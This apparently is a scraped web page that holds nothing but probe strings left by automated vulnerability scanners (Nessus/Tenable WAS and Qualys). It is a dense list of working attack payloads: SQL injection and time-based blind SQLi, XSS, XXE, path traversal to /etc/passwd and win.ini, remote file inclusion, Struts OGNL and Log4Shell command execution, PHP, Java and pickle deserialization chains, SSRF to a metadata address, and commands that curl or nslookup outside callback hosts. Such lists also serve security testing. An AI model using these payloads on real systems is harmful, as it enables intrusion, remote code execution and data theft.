1lIjt9czoyNDoiAFBpbXBsZVxDb250YWluZXIAdmFsdWVzIjthOjE6e3M6MzoiaGFzIjtzOjEzOiJnZXRob3N0YnluYW1lIjt9czoyMjoiAFBpbXBsZVxDb250YWluZXIAa2V5cyI7YToxOntzOjM6ImhhcyI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7fX19fWk6MTtzOjY3OiJ2bzZib2N3cWVkanBtbzV5aWM2M2YzcDR3NnI0MnJyNHJvaDcyajZmeWV5NWwzNXoyZnJxLndhcy5uZXNzdXMub3JnIjt9fX19czo3OiIAKgBib2R5IjtzOjA6IiI7fWk6NztpOjc7fQ==
YToyOntpOjc7TzoyNzoiR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llIjoxOntzOjMzOiIAR3V6emxlSHR0cFxDb29raWVcU2V0Q29va2llAGRhdGEiO086MzM6IlJlcXVlc3RzX1V0aWxpdHlfRmlsdGVyZWRJdGVyYXRvciI6NDp7aTowO2k6MDtpOjE7YToyOntzOjQ6Ik5hbWUiO3M6Njc6Inl5ZGFteTVhM25ueGV6Nzd4amdnNHp0NnJ0YjRmaXNvZ3Bucmp2eWk3ZGFwYzM0amc0ZHEud2FzLm5lc3N1cy5vcmciO3M6NToiVmFsdWUiO3M6MDoiIjt9aToyO2E6MTp7czoxMToiACoAY2FsbGJhY2siO3M6MTM6ImdldGhvc3RieW5hbWUiO31pOjM7Tjt9fWk6NztpOjc7fQ==
nessus_was_textt2jo242u
file:///etc/passwd
nessus_was_textj2u1ekpu
nessus_was_text8mpgpcqo
@(“tnbwas_vQH7ht0Ok0Jp”+6936*9815)
nessus_was_textqk4qn3ue
nessus_was_text553spjgh
{“tnbwas_vQH7ht0Ok0Jp”}{6936*9815}
nessus_was_textn67k4jn5
nessus_was_textgai4zloa
nessus_was_textu8i02znc”‘`–
nessus_was_textveqotqn2
nessus_was_textg9bxnjpi
nessus_was_textzj6ae5i9
<!DOCTYPE test []>&xxe;
nessus_was_textcix8d1xz'”
Version:|Vendor:
nessus_was_textozbe87py
nessus_was_textbuvg7zws
nessus_was_text7fooewx6 script:;tenable_wasscan_xss_in_element_event=c8d60244-f5bb-40dc-ab6f-9c0b3c79c672//
nessus_was_text39rlw2qz
nessus_was_textky97kkx9 tenable_wasscan_xss_in_tag=c8d60244-f5bb-40dc-ab6f-9c0b3c79c672 blah=
‘ || ‘a’==’a
abcd
nessus_was_textfjklxpje
nessus_was_textog2himod
nessus_was_textnv2qozwf
-1839′ or ‘1839’=’1839
-1839
nessus_was_text36lh974q
1′ limit 0, 1386 —
nessus_was_textn8wcrc8n
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
nessus_was_textb5x8kf4e
10002
nessus_was_textbxmw10r5
-1756
sleep 4
nessus_was_texthzxxmmpe
nessus_was_textk988e412
nessus_was_textrow7d7mu
nessus_was_text2ir3ta86
nessus_was_textk87gl25l
sleep(4);
nessus_was_textjjcj95y4
nessus_was_text566y1eki AND (SELECT 3243 FROM (SELECT(SLEEP(2)))THQMo)
nessus_was_textkxi8qgy9
nessus_was_text0ylp7h6v
nessus_was_textv3hyixkc
nessus_was_textsl6xog4f
nessus_was_textqmb5lm4m
nessus_was_text6kkv2kyo
nessus_was_texto9n3e8i5
nessus_was_textns7ru02z
nessus_was_textekc42agp
nessus_was_textso1nhx04
nessus_was_textndfk1hj3
nessus_was_textbl1y5no1;select pg_sleep(2); — ‘;select pg_sleep(2); — “;select pg_sleep(2); — –
nessus_was_text7447e8ic
nessus_was_text6z1l5e23
nessus_was_text0xlk34jc
https://xssrcFeNXgDIy.was.tenable.com
nessus_was_text65gtd048 tenable_wasscan_xss_in_tag=bdd76bd5-0003-419f-a2a7-5652f4f4d2bd blah=
nessus_was_textn1xpjthq${dns:address|msufeizwam4hhlg6brlummun63qcaxgmnzbr7qjoh3q54yapr4wq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((696*974))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
‘tnbwas_pEGwBSduAZNS’+3910*7443
{{’tnbwas_pEGwBSduAZNS’+3910*7443}}
nessus_was_textrxq7s856
php://input
was-tnb-vnj
nessus_was_textzm21d28p
nessus_was_textegtoycwx
nessus_was_textcfsqbov7
nessus_was_texttkd63p5o
was-tnb-ukl
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400437861757a74336b766c746637326f707679643337367a6c356a66626f376d747569337637726a6b6f797174726f326d61776637612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f7861757a74336b766c746637326f707679643337367a6c356a66626f376d747569337637726a6b6f797174726f326d61776637612e7761732e6e65737375732e6f726778
nessus_was_textlk3b9m97
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textgj27e1yy’;.”)
abcd
type C:\Windows\win.ini
nessus_was_textbognboxu
nessus_was_textw6y1sdkl
||nslookup -domain=”was.nessus.org” gwrbiapsmjmbc75jg6zytpaxrtyc7kww7uvzrkytvmkqh2yjqtza
/../../../../../../../../../../windows/win.ini
nessus_was_texti3lr6jsl
…/./…/./…/./…/./…/./…/./…/./…/./windows/win.ini
nessus_was_textgywg18tc
nessus_was_textv45cmy4s
nessus_was_textnj9rigg5
https://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textqv4eea3m
nessus_was_texttu1jgbuj
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6Imc0ZnJjN3B4dHlkNnFpZG1zZHV3bWs3dzM3aXpucGF5bmQ3bGpwb21lZWdmcGZkZDJ4dXEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
a:2:{i:7%3BO:24:”GuzzleHttp\Psr7\FnStream”:2:{s:33:”%00GuzzleHttp\Psr7\FnStream%00methods”%3Ba:1:{s:5:”close”%3Ba:2:{i:0%3BO:23:”GuzzleHttp\HandlerStack”:3:{s:32:”%00GuzzleHttp\HandlerStack%00handler”%3Bs:11:”tenable.was”%3Bs:30:”%00GuzzleHttp\HandlerStack%00stack”%3Ba:1:{i:0%3Ba:1:{i:0%3Bs:13:”gethostbyname”%3B}}s:31:”%00GuzzleHttp\HandlerStack%00cached”%3Bb:0%3B}i:1%3Bs:7:”resolve”%3B}}s:9:”_fn_close”%3Ba:2:{i:0%3BO:23:”GuzzleHttp\HandlerStack”:3:{s:32:”%00GuzzleHttp\HandlerStack%00handler”%3Bs:11:”tenable.was”%3Bs:30:”%00GuzzleHttp\HandlerStack%00stack”%3Ba:1:{i:0%3Ba:1:{i:0%3Bs:13:”gethostbyname”%3B}}s:31:”%00GuzzleHttp\HandlerStack%00cached”%3Bb:0%3B}i:1%3Bs:7:”resolve”%3B}}i:7%3Bi:7%3B}
nessus_was_text1ssmcsel
nessus_was_texttdjg6k7j
nessus_was_texth8wih7ij
nessus_was_text0f7o74af
nessus_was_textycagi4zc
nessus_was_text5rxpf06y
nessus_was_textjhcg72te
nessus_was_textgvqh77le
nessus_was_textdv196dc3
nessus_was_textx8rzdulp
nessus_was_textp494xno7″‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIHdvbDVraGF1anJraWtkeWN1NnB2b2V1czc3bWpmcDNha3Frbm9mc2xicWpqcXRxemV1eGEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_text02ur893r
//mdxtelecom.com.br.bdd76bd5-0003-419f-a2a7-5652f4f4d2bd.com
nessus_was_textfth141jz
nessus_was_textpxywkj59′”
Version:|Vendor:
nessus_was_textvvvcwocq
“/;-window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()//
wasxsscontext0r6j7n
nessus_was_text8em4jlcv
abcd
nessus_was_text9k7bv8ng
nessus_was_text8wu4lvxf
6339
-1845
nessus_was_text3de91wvg
nessus_was_textqsgo2lyt
-1839 or 1839=1839
-1839
nessus_was_textfl6gyyrx
10001839
1′ limit 0, 1386 —
1386a
nessus_was_text1aiu1p3f
10002’+(select ‘1’,’2′)+’1
nessus_was_textfnrv47bh
nessus_was_textf1k35akg
-1756′ or ‘1756’=’1756′ — +
-1756
nessus_was_text9md52urv
nessus_was_textbtr13ijy
nessus_was_textovnx0wqt
nessus_was_textjl5sreuy
nessus_was_text6al9h3fp
||powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
nessus_was_textbgmqljow
nessus_was_textk2gginvv AND (SELECT 4704 FROM (SELECT(SLEEP(2)))cZMrW)
nessus_was_texts0g595yj
nessus_was_textoeoz0bxp
nessus_was_textelyu63nh
nessus_was_textevu00v9a
‘=sleep(2)=’
nessus_was_textf6sypmmq
;waitfor delay ‘0:0:2’– “;waitfor delay ‘0:0:2’– “
nessus_was_textg9xt2mex
nessus_was_text7wfkci9b
nessus_was_textixwoenwb
nessus_was_text58xn0cxs
nessus_was_textmvffk9ho
nessus_was_textwe7zrgq7
nessus_was_textwvz0gbn6${dns:address|jdxjqnce4v52pr3xrmuwlm3ucb4kykuhlkbryuetqsoza2pu32nq.was.nessus.org}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((653*514))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
nessus_was_text6xbwrr1q
‘tnbwas_tj0DpbRjNQVY’+2184*6797
nessus_was_textgilyabpq
p “WAS#{96678*45529}”
php://input
was-tnb-mya
nessus_was_texti47egg6j
nessus_was_text7b04ch3x
nessus_was_textsy8y0tqw
${jndi:ldap://was-log4shell-${date:yyyy}rVdejXr2PpbGjEM5vQzE.w.nessus.org}
nessus_was_textqrpob401
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740043696c6976663774686c786c72337633626133327061646b73786379337763656732667675686e71787674736f626c6a61713577712e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f696c6976663774686c786c72337633626133327061646b73786379337763656732667675686e71787674736f626c6a61713577712e7761732e6e65737375732e6f726778
nessus_was_textg7llx7d2
C:/windows/win.ini
nessus_was_textsvflmcw3
nessus_was_textu5vpltmx’;.”)
abcd
nessus_was_text096yn67d
nessus_was_textb12dkh7p
nessus_was_texta4npegvw
/../../../../../../../../../../windows/win.ini
nessus_was_texthqleij4h
nessus_was_textxpnc9sht
nessus_was_text8zxnusth
nessus_was_text3urkwlac
https://rfi.nessus.org/rfi.txt
nessus_was_textge0xdvot
nessus_was_texti2oqb199
file:///etc/passwd
netdoc://localhost/etc/passwd
http://2852039166/latest/
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6ImE3cWFtM3hramdlamc1M2NjNzZ0aWV5dWY0cnAyZWx5bmJhZGVyZWw1NWFzcXVmdGhtbWEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
nessus_was_textvc2g3cxe
nessus_was_text4kti5j9m
nessus_was_text3nq9ib2u
nessus_was_textuac20l41
nessus_was_textcbah7f5f
nessus_was_text4via5qne
nessus_was_text7yp7wpi4
nessus_was_textht24rrvv
nessus_was_textnzvsye9z
{{variable.getClass().forName(‘java.net.InetAddress’).getByName(‘qvuzl3owbj55y4jxlvfok4zp56j7bs7rme2xot7jlwd7upijhoxq’+’.was.nessus.org’)}}
nessus_was_textb3vp3dpf
nessus_was_text2ozvoe24
nessus_was_text9g5opp7h
nessus_was_text2rfl9xyy
nessus_was_textkonkv6zm
nessus_was_textdjiu6uu7
Version:|Vendor:
nessus_was_textsisg7hof
nessus_was_text5ydrtz96
1){window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()//
window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()
nessus_was_textuw2w8euq
nessus_was_textlh919dw7 script:;tenable_wasscan_xss_in_element_event=5850a687-5a03-4ec5-9806-f18760dd5dc8//
https://xssrcQctuGZuH.was.tenable.com
nessus_was_textvqxcnvnz
nessus_was_textwftl3u6g
nessus_was_textgnm4bzui
1386a
6339
nessus_was_textegr7g1tz
-1839′ or ‘1839’=’1839
nessus_was_textoxxgqr6q
-1839
10001839′ or ‘1839’=’1839
10001839
1′ limit 0, 1386 —
nessus_was_text8r4cv1ar
nessus_was_text2294pz06
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
10002
1 procedure analyse()– +
-1756′ or ‘1756’=’1756′ — +
nessus_was_textboznr65f
-1756
nessus_was_textvbj4j80y
nessus_was_textbjv45qpl
nessus_was_textexb9mceo
nessus_was_textsm6mssby
nessus_was_textzpz3ggpr
sleep(4);
nessus_was_text7xwa5vfp
nessus_was_text01qdw4yu AND (SELECT 8239 FROM (SELECT(SLEEP(2)))GqVtT)
nessus_was_text1qg3gok9
nessus_was_textoxqsrcrm
nessus_was_textkpmnlip1
nessus_was_text6a1kg789
nessus_was_text6x1b0vqy
nessus_was_texti12ccj4q
nessus_was_textrqgoib68
nessus_was_textz0sx6d8t
nessus_was_texth149wren
nessus_was_textlq1wz5ax
nessus_was_textu0fefuaf
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((992*776))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
nessus_was_textxoj5fkwx
nessus_was_textao63lmex
nessus_was_textjryr0bnn
nessus_was_textyjl7f4s3
nessus_was_textsnnrh3m8
was-tnb-eap
nessus_was_textkecrobiw
nessus_was_textbwlkimpr
${jndi:ldap://was-log4shell-${date:yyyy}x2OIGySA3uUdXpcoKKnq.w.nessus.org}
nessus_was_textoal0ofkc
was-tnb-frr
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740043766f76746b346a6b333367616b766c636272757169336934686b6c357335706b73776d677161357878636a6170677633637864712e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f766f76746b346a6b333367616b766c636272757169336934686b6c357335706b73776d677161357878636a6170677633637864712e7761732e6e65737375732e6f726778
nessus_was_text523q7yqe
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textad7pyt10
abcd
nessus_was_text3lbz32ns
nessus_was_textrpp243cc
nessus_was_textk4h423ft
/../../../../../../../../../../windows/win.ini
nessus_was_textsktu8n68
nessus_was_textjl2dxnue
nessus_was_texta8hmazzh
nessus_was_texthlmwtx3c
nessus_was_textt9s3201e
https://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textjfiguq8g
nessus_was_textc94afnn3
nessus_was_text9zy92lza
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6ImdmNHJ4aDQ0N29yYmJ5YWIyZXh2c2ZtN3VheXJqa2p3djR1NjRlbHprZGl0cHJqeWJjdXEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
nessus_was_textgr7mggtt
nessus_was_textq3jdvru8
nessus_was_textdu0mh4jr
nessus_was_text98ac5yqt
nessus_was_textu51sav7q
nessus_was_textnpv2f61g
nessus_was_textl6j74fw8
nessus_was_textikv1gsty
nessus_was_textm3aysz57
nessus_was_text5685asee”‘`–
gAJjb3MKc3lzdGVtCnEAWEgAAABwaW5nIGJ1enFicWc0ZWlpZzMzaWg2dWplNGo1dXVrdXpqYXBzdXBsbW50NXB0bzRiMmFnY3YzbWEud2FzLm5lc3N1cy5vcmdxAYVxAlJxAy4=
nessus_was_text20ygs26c
https://3e5b1347-ea88-466b-a00a-56ec3e3fa938.com?x=/
nessus_was_texti5viq3ec
nessus_was_textxp62kqe5′”
Version:|Vendor:
nessus_was_textzf2e49pn
nessus_was_text7m4tmbx4
nessus_was_textva54zk41
nessus_was_textsk3npr5q
wasxsscontext1g7h7q
nessus_was_text8bgrf5av script:;tenable_wasscan_xss_in_element_event=3e5b1347-ea88-466b-a00a-56ec3e3fa938//
https://xssrcQFBpttaH.was.tenable.com
nessus_was_textejxr5bfr
abcd
was_xpath_injection
nessus_was_textbd68ddb2
6339
-1756
nessus_was_text6m8vs28q
-1839′ or ‘1839’=’1839
-1839′ or ‘1839’=’1839
-1839
nessus_was_textopzhrkwh
10001839
nessus_was_textwf7q51d0
nessus_was_textvxptd6an
1386a
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
10002’+(select ‘1’,’2′)+’1
nessus_was_textvti6b27v
1 procedure analyse()– +
-1756′ or ‘1756’=’1756′ — +
nessus_was_textcmjvghxk
-1756
nessus_was_textr35izn84
nessus_was_text9zsmtaq5
nessus_was_textlfqti3gd
nessus_was_textqrn4uzky
nessus_was_textkqfcqwp3
nessus_was_textc5jo5x3m
nessus_was_textuyzl9rff||powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
nessus_was_text0cpfh2y7
nessus_was_textk3k08ydk AND (SELECT 3954 FROM (SELECT(SLEEP(2)))QkQCS)
nessus_was_textf9cf2ico
nessus_was_textukifs97a
nessus_was_text3uvjq7df
nessus_was_texts05etc7y
nessus_was_text8builz5t
nessus_was_text2uscmf9s”=sleep(2)=”
nessus_was_textfo7p56lj
nessus_was_textcxbby0d7
nessus_was_textbp5b8ff0
nessus_was_textlfu6w2z1
nessus_was_textx4wmjgcq
nessus_was_textjq58o1dn
nessus_was_textnzn09k45
1
1
1″‘>
1
1
1
1
,
1
%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
1
1
1
1
1
1
${script:javascript:java.lang.Runtime.getRuntime().exec(‘curl http://c64e5a894d55c55a22e4ffe95870050b83fd8a19.3764217161708601.1395765007.oscomm02.oscomm.us4.qualysperiscope.com.’)}
1
1
1
1
$..[?(p=”console.log(this.process.mainModule.require(‘child_process’).execSync(‘curl 0bb8cb7bd2ae3068568a1f20ae0330fd63e03e2f.3764217161708601.3128458544.oscomm15279701.oscomm.us4.qualysperiscope.com.’).toString())”;QualysWAS=”[[‘constructor’]][[‘constructor’]](p);QualysWAS())]
1
1
” onfocus=alert(81) autofocus=true onEvent=X139751729938624Y5_2Z
1
1
1
1
1
1
1
1
1
1
1
nessus_was_textyotish7k tenable_wasscan_xss_in_tag=73fc2a27-216c-4de5-be27-ae14b531769c blah=
nessus_was_textau0c9x3c
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((776*821))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
nessus_was_text84ic2a0i
‘tnbwas_Tt6e5AHVpuNh’+3006*9679
nessus_was_textkuabsv0u
nessus_was_text5cjj81ev
nessus_was_text35qjny5n
nessus_was_textgaldyxcy
php://input
was-tnb-deq
nessus_was_text192emzu0
nessus_was_text6hi52y9t
nessus_was_text0nnm6ibu
nessus_was_text7pgi7wbn
nessus_was_textwdbvjf9l
nessus_was_text5hshl8r7
nessus_was_text851l07oi
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff7400436e70666678786f326f37733435613632337a736b7a376666676a73696c376c6c7564656f6b666d637735757a7766746b726174612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f6e70666678786f326f37733435613632337a736b7a376666676a73696c376c6c7564656f6b666d637735757a7766746b726174612e7761732e6e65737375732e6f726778
nessus_was_text9i8hwe8t
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textzfvoffyv’;.”)
abcd
type C:\Windows\win.ini
